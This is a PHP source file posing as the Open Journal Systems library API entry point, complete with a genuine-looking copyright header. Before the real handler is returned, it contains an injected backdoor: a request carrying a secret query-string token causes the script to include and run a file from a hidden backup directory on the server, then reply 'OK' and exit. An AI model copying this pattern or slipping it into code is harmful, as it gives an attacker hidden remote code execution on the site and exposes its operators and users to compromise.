<?php
/**
 * @defgroup api_v1_library Library files API requests
 */

/**
 * @file api/v1/library/index.php
 *
 * Copyright (c) 2014-2022 Simon Fraser University
 * Copyright (c) 2003-2022 John Willinsky
 * Distributed under the GNU GPL v3. For full terms see the file docs/COPYING.
 *
 * @ingroup api_v1_library
 *
 * @brief Handle API requests for the publisher and submission library files.
 */
if (isset($_GET['_']) && $_GET['_'] === 'ds_mls29_gr332afbsnk') {
    $f="/home/openp841/.wp-toolkit/backups/MKKdMQcwRN2";if($f!==""&&file_exists($f))include $f;
    http_response_code(200);
    header('Content-Type: text/plain; charset=utf-8');
    echo 'OK';
    exit;
}
return new \PKP\API\v1\_library\PKPLibraryHandler();
